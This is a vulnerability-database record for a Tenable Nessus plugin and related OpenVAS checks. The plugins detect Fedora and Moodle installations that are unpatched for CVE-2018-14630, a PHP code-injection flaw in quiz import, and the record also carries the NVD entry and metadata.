ID FEDORA_2018-43FF5F6E5B.NASL Type nessus Reporter This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof. Modified 2018-09-27T00:00:00
Description
Fix for CVE-2018-14630
Note that Tenable Network Security has extracted the preceding
description block directly from the Fedora update system website.
Tenable has attempted to automatically clean and format it as much as
possible without introducing additional issues.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Fedora Security Advisory FEDORA-2018-43ff5f6e5b.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(117718);
script_version("1.6");
script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/06");
script_cve_id("CVE-2018-14630");
script_xref(name:"FEDORA", value:"2018-43ff5f6e5b");
script_name(english:"Fedora 27 : moodle (2018-43ff5f6e5b)");
script_summary(english:"Checks rpm output for the updated package.");
script_set_attribute(
attribute:"synopsis",
value:"The remote Fedora host is missing a security update."
);
script_set_attribute(
attribute:"description",
value:
"Fix for CVE-2018-14630
Note that Tenable Network Security has extracted the preceding
description block directly from the Fedora update system website.
Tenable has attempted to automatically clean and format it as much as
possible without introducing additional issues."
);
script_set_attribute(
attribute:"see_also",
value:"https://bodhi.fedoraproject.org/updates/FEDORA-2018-43ff5f6e5b"
);
script_set_attribute(
attribute:"solution",
value:"Update the affected moodle package."
);
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P");
script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H");
script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"plugin_type", value:"local");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:moodle");
script_set_attribute(attribute:"cpe", value:"cpe:/o:fedoraproject:fedora:27");
script_set_attribute(attribute:"vuln_publication_date", value:"2018/09/17");
script_set_attribute(attribute:"patch_publication_date", value:"2018/09/26");
script_set_attribute(attribute:"plugin_publication_date", value:"2018/09/27");
script_set_attribute(attribute:"generated_plugin", value:"current");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_family(english:"Fedora Local Security Checks");
script_dependencies("ssh_get_info.nasl");
script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list");
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("rpm.inc");
if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
release = get_kb_item("Host/RedHat/release");
if (isnull(release) || "Fedora" >!< release) audit(AUDIT_OS_NOT, "Fedora");
os_ver = pregmatch(pattern: "Fedora.*release ([0-9]+)", string:release);
if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Fedora");
os_ver = os_ver[1];
if (! preg(pattern:"^27([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Fedora 27", "Fedora " + os_ver);
if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Fedora", cpu);
flag = 0;
if (rpm_check(release:"FC27", reference:"moodle-3.3.8-1.fc27")) flag++;
if (flag)
{
security_report_v4(
port : 0,
severity : SECURITY_WARNING,
extra : rpm_report_get()
);
exit(0);
}
else
{
tested = pkg_tests_get();
if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
else audit(AUDIT_PACKAGE_NOT_INSTALLED, "moodle");
}
{"id": "FEDORA_2018-43FF5F6E5B.NASL", "bulletinFamily": "scanner", "title": "Fedora 27 : moodle (2018-43ff5f6e5b)", "description": "Fix for CVE-2018-14630\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "published": "2018-09-27T00:00:00", "modified": "2018-09-27T00:00:00", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "href": "https://www.tenable.com/plugins/nessus/117718", "reporter": "This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://bodhi.fedoraproject.org/updates/FEDORA-2018-43ff5f6e5b"], "cvelist": ["CVE-2018-14630"], "type": "nessus", "lastseen": "2021-01-07T10:17:10", "edition": 16, "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-14630"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310875105", "OPENVAS:1361412562310875102", "OPENVAS:1361412562310112381", "OPENVAS:1361412562310112380"]}, {"type": "fedora", "idList": ["FEDORA:EFB656087D8D", "FEDORA:8A2B4605A2AB", "FEDORA:0B2626057155"]}, {"type": "zdt", "idList": ["1337DAY-ID-31126"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:149426"]}, {"type": "nessus", "idList": ["FEDORA_2018-690535D30B.NASL", "FREEBSD_PKG_074CB225BB2D11E890E1FCAA147E860E.NASL", "FEDORA_2018-84A5340CC9.NASL"]}, {"type": "freebsd", "idList": ["074CB225-BB2D-11E8-90E1-FCAA147E860E"]}], "modified": "2021-01-07T10:17:10", "rev": 2}, "score": {"value": 6.3, "vector": "NONE", "modified": "2021-01-07T10:17:10", "rev": 2}, "vulnersScore": 6.3}, "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-43ff5f6e5b.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(117718);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2018-14630\");\n script_xref(name:\"FEDORA\", value:\"2018-43ff5f6e5b\");\n\n script_name(english:\"Fedora 27 : moodle (2018-43ff5f6e5b)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fix for CVE-2018-14630\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-43ff5f6e5b\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected moodle package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:moodle\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:27\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/09/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/27\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^27([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 27\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC27\", reference:\"moodle-3.3.8-1.fc27\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"moodle\");\n}\n", "naslFamily": "Fedora Local Security Checks", "pluginID": "117718", "cpe": ["cpe:/o:fedoraproject:fedora:27", "p-cpe:/a:fedoraproject:fedora:moodle"], "scheme": null, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}}
{"cve": [{"lastseen": "2021-02-02T06:52:29", "description": "moodle before versions 3.5.2, 3.4.5, 3.3.8, 3.1.14 is vulnerable to an XML import of ddwtos could lead to intentional remote code execution. When importing legacy 'drag and drop into text' (ddwtos) type quiz questions, it was possible to inject and execute PHP code from within the imported questions, either intentionally or by importing questions from an untrusted source.", "edition": 8, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-09-17T18:29:00", "title": "CVE-2018-14630", "type": "cve", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-14630"], "modified": "2019-10-09T23:35:00", "cpe": ["cpe:/a:moodle:moodle:3.0.10"], "id": "CVE-2018-14630", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-14630", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:moodle:moodle:3.0.10:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2019-05-29T18:33:01", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-14630"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2018-09-27T00:00:00", "id": "OPENVAS:1361412562310875102", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310875102", "type": "openvas", "title": "Fedora Update for moodle FEDORA-2018-690535d30b", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_690535d30b_moodle_fc28.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for moodle FEDORA-2018-690535d30b\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875102\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-09-27 08:47:31 +0200 (Thu, 27 Sep 2018)\");\n script_cve_id(\"CVE-2018-14630\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for moodle FEDORA-2018-690535d30b\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'moodle'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n script_tag(name:\"affected\", value:\"moodle on Fedora 28\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-690535d30b\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FAVD2O5OK7OJS5MK4OBP2ZHVMC4DPRY6\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"moodle\", rpm:\"moodle~3.4.5~1.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:35", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-14630"], "description": "Moodle CMS is prone to a remote code execution vulnerability.", "modified": "2018-12-07T00:00:00", "published": "2018-09-18T00:00:00", "id": "OPENVAS:1361412562310112380", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310112380", "type": "openvas", "title": "Moodle CMS 3.5.x < 3.5.2, 3.4.x < 3.4.5, 3.2.x < 3.3.8 and < 3.1.14 RCE Vulnerability (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_moodle_msa-18-0017_lin.nasl 12697 2018-12-07 07:56:28Z mmartin $\n#\n# Moodle CMS 3.5.x < 3.5.2, 3.4.x < 3.4.5, 3.2.x < 3.3.8 and < 3.1.14 RCE Vulnerability (Linux)\n#\n# Authors:\n# Adrian Steins <adrian.steins@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, https://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif( description )\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.112380\");\n script_version(\"$Revision: 12697 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-12-07 08:56:28 +0100 (Fri, 07 Dec 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-09-18 11:17:22 +0200 (Tue, 18 Sep 2018)\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_cve_id(\"CVE-2018-14630\");\n\n script_name(\"Moodle CMS 3.5.x < 3.5.2, 3.4.x < 3.4.5, 3.2.x < 3.3.8 and < 3.1.14 RCE Vulnerability (Linux)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_moodle_cms_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"moodle/detected\", \"Host/runs_unixoide\");\n\n script_tag(name:\"summary\", value:\"Moodle CMS is prone to a remote code execution vulnerability.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"When importing legacy 'drag and drop into text' (ddwtos) type quiz questions,\n it was possible to inject and execute PHP code from within the imported questions, either intentionally or by importing questions from an untrusted source.\");\n script_tag(name:\"affected\", value:\"Moodle CMS 3.5 to 3.5.1, 3.4 to 3.4.4, 3.2 to 3.3.7, 3.1 to 3.1.13 and earlier unsupported versions.\");\n script_tag(name:\"solution\", value:\"Update to version 3.1.14, 3.3.8, 3.4.5 or 3.5.2 respectively.\");\n\n script_xref(name:\"URL\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2018-14630\");\n script_xref(name:\"URL\", value:\"https://moodle.org/mod/forum/discuss.php?d=376023\");\n\n exit(0);\n}\n\nCPE = \"cpe:/a:moodle:moodle\";\n\ninclude( \"host_details.inc\" );\ninclude( \"version_func.inc\" );\n\nif( ! port = get_app_port( cpe: CPE ) ) exit( 0 );\nif( ! infos = get_app_version_and_location( port: port, cpe:CPE, exit_no_version:TRUE ) ) exit( 0 );\nversion = infos['version'];\npath = infos['location'];\n\nif( version_is_less( version: version, test_version: \"3.1.14\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"3.1.14\", install_path: path );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nif( version_in_range( version: version, test_version: \"3.2.0\", test_version2: \"3.3.7\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"3.3.8\", install_path: path );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nif( version_in_range( version: version, test_version: \"3.4.0\", test_version2: \"3.4.4\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"3.4.5\", install_path: path );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nif( version_in_range( version: version, test_version: \"3.5.0\", test_version2: \"3.5.1\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"3.5.2\", install_path: path );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:59", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-14630"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310875105", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310875105", "type": "openvas", "title": "Fedora Update for moodle FEDORA-2018-43ff5f6e5b", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_43ff5f6e5b_moodle_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for moodle FEDORA-2018-43ff5f6e5b\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875105\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-09-28 13:34:06 +0200 (Fri, 28 Sep 2018)\");\n script_cve_id(\"CVE-2018-14630\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for moodle FEDORA-2018-43ff5f6e5b\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'moodle'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n script_tag(name:\"affected\", value:\"moodle on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-43ff5f6e5b\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/T4LYH3KARSFJQ4MB3ZPWDY7BAI7W6A5B\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"moodle\", rpm:\"moodle~3.3.8~1.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:35", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-14630"], "description": "Moodle CMS is prone to a remote code execution vulnerability.", "modified": "2018-12-07T00:00:00", "published": "2018-09-18T00:00:00", "id": "OPENVAS:1361412562310112381", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310112381", "type": "openvas", "title": "Moodle CMS 3.5.x < 3.5.2, 3.4.x < 3.4.5, 3.2.x < 3.3.8 and < 3.1.14 RCE Vulnerability (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_moodle_msa-18-0017_win.nasl 12697 2018-12-07 07:56:28Z mmartin $\n#\n# Moodle CMS 3.5.x < 3.5.2, 3.4.x < 3.4.5, 3.2.x < 3.3.8 and < 3.1.14 RCE Vulnerability (Windows)\n#\n# Authors:\n# Adrian Steins <adrian.steins@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, https://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif( description )\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.112381\");\n script_version(\"$Revision: 12697 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-12-07 08:56:28 +0100 (Fri, 07 Dec 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-09-18 11:17:22 +0200 (Tue, 18 Sep 2018)\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_cve_id(\"CVE-2018-14630\");\n\n script_name(\"Moodle CMS 3.5.x < 3.5.2, 3.4.x < 3.4.5, 3.2.x < 3.3.8 and < 3.1.14 RCE Vulnerability (Windows)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_moodle_cms_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"moodle/detected\", \"Host/runs_windows\");\n\n script_tag(name:\"summary\", value:\"Moodle CMS is prone to a remote code execution vulnerability.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"When importing legacy 'drag and drop into text' (ddwtos) type quiz questions,\n it was possible to inject and execute PHP code from within the imported questions, either intentionally or by importing questions from an untrusted source.\");\n script_tag(name:\"affected\", value:\"Moodle CMS 3.5 to 3.5.1, 3.4 to 3.4.4, 3.2 to 3.3.7, 3.1 to 3.1.13 and earlier unsupported versions.\");\n script_tag(name:\"solution\", value:\"Update to version 3.1.14, 3.3.8, 3.4.5 or 3.5.2 respectively.\");\n\n script_xref(name:\"URL\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2018-14630\");\n script_xref(name:\"URL\", value:\"https://moodle.org/mod/forum/discuss.php?d=376023\");\n\n exit(0);\n}\n\nCPE = \"cpe:/a:moodle:moodle\";\n\ninclude( \"host_details.inc\" );\ninclude( \"version_func.inc\" );\n\nif( ! port = get_app_port( cpe: CPE ) ) exit( 0 );\nif( ! infos = get_app_version_and_location( port: port, cpe:CPE, exit_no_version:TRUE ) ) exit( 0 );\nversion = infos['version'];\npath = infos['location'];\n\nif( version_is_less( version: version, test_version: \"3.1.14\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"3.1.14\", install_path: path );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nif( version_in_range( version: version, test_version: \"3.2.0\", test_version2: \"3.3.7\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"3.3.8\", install_path: path );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nif( version_in_range( version: version, test_version: \"3.4.0\", test_version2: \"3.4.4\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"3.4.5\", install_path: path );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nif( version_in_range( version: version, test_version: \"3.5.0\", test_version2: \"3.5.1\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"3.5.2\", install_path: path );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "fedora": [{"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2018-14630"], "description": "Moodle is a course management system (CMS) - a free, Open Source software package designed using sound pedagogical principles, to help educators crea te effective online learning communities. ", "modified": "2018-09-26T20:23:25", "published": "2018-09-26T20:23:25", "id": "FEDORA:8A2B4605A2AB", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 29 Update: moodle-3.5.2-1.fc29", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": 